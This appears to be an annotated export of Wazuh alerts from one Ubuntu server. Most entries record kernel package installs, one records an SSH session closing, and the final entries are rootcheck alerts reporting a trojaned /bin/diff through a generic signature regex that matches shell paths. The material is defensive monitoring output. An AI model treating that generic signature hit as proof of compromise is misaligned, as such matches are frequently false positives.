rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533388.23610 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:07 install linux-modules-extra-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-extra-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533392.24064 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:10 status half-configured linux-generic:amd64 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-57.59 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533392.24549 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:11 status half-configured linux-image-generic:amd64 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-image-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-57.59 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533392.25046 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:11 install linux-headers-6.8.0-58:all 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-headers-6.8.0-58 Package name involved (apt/yum). Good for vuln tracking.
data.arch: all System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533400.25468 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:19 install linux-headers-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-headers-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533404.25910 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:22 status half-configured linux-headers-generic:amd64 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-headers-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-57.59 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533404.26411 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:22 install linux-tools-6.8.0-58:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533404.26833 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:23 install linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533404.27271 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:23 status half-configured linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533410.27790 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:30 status installed linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533410.28295 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:30 status half-configured linux-tools-6.8.0-58:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533410.28794 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:30 status installed linux-tools-6.8.0-58:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533410.29279 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:30 status half-configured linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-image-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60+1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.29798 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:23:38.270570+00:00 server1 sshd[71763]: pam_unix(sshd:session): session closed for user simba The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:23:38.270570+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.30190 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:37 status installed linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-image-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60+1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.30695 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:37 status half-configured linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.31210 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:37 status installed linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.31711 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:37 status half-configured linux-modules-extra-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-extra-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Host-based anomaly detection event (rootcheck). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 510 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec', 'rootcheck'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533781.32242 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: Trojaned version of file '/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic). The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: rootcheck Name of the Wazuh decoder that parsed this raw log.
data.title: Trojaned version of file detected. Short title some decoders add – usually informational.
data.file: /bin/diff Generic file path referenced in the log.
location: rootcheck Which log source produced the event (e.g., sysmon, auditd).
rule.description: Host-based anomaly detection event (rootcheck). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 510 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec', 'rootcheck'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
